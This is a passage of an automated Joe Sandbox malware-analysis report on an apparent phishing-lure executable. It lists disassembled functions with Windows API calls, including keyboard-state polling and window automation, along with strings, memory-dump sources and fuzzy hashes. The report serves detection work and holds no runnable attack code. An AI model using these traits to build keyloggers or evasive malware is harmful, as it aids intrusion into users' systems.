                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove_wcslen
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 369157077-1007645807
                                                        • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                        • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                        • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                        • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                        Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 00445BF8
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                        • __wcsicoll.LIBCMT ref: 00445C33
                                                        • __wcsicoll.LIBCMT ref: 00445C4F
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsicoll$ClassMessageNameParentSend
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 3125838495-3381328864
                                                        • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                        • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                        • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                        • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                        Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                        • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                        • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                        • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                        • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CharNext
                                                        • String ID:
                                                        • API String ID: 1350042424-0
                                                        • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                        • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                        • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                        • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                        Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                        • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                        • _wcscpy.LIBCMT ref: 004787E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                        • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 3052893215-2127371420
                                                        • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                        • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                        • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                        • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                        Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                        • __swprintf.LIBCMT ref: 0045E7F7
                                                        • _wprintf.LIBCMT ref: 0045E8B3
                                                        • _wprintf.LIBCMT ref: 0045E8D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2295938435-2354261254
                                                        • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                        • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                        • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                        • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                        Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __swprintf_wcscpy$__i64tow__itow
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 3038501623-2263619337
                                                        • Opcode ID: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                                                        • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                        • Opcode Fuzzy Hash: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                                                        • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                        Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                        • __swprintf.LIBCMT ref: 0045E5F6
                                                        • _wprintf.LIBCMT ref: 0045E6A3
                                                        • _wprintf.LIBCMT ref: 0045E6C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2295938435-8599901
                                                        • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                        • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                        • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                        • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                        Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00443B67
                                                          • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                        • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                        • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                        • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                        • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                        • IsWindow.USER32(00000000), ref: 00443C3A
                                                        • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                        • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1834419854-3405671355
                                                        • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                        • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                        • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                        • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                        Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                        • LoadStringW.USER32(00000000), ref: 00454040
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • _wprintf.LIBCMT ref: 00454074
                                                        • __swprintf.LIBCMT ref: 004540A3
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 455036304-4153970271
                                                        • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                        • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                        Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                        • _memmove.LIBCMT ref: 00467EB8
                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                        • _memmove.LIBCMT ref: 00467F6C
                                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                        • String ID:
                                                        • API String ID: 2170234536-0
                                                        • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                        • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                        Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                        Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
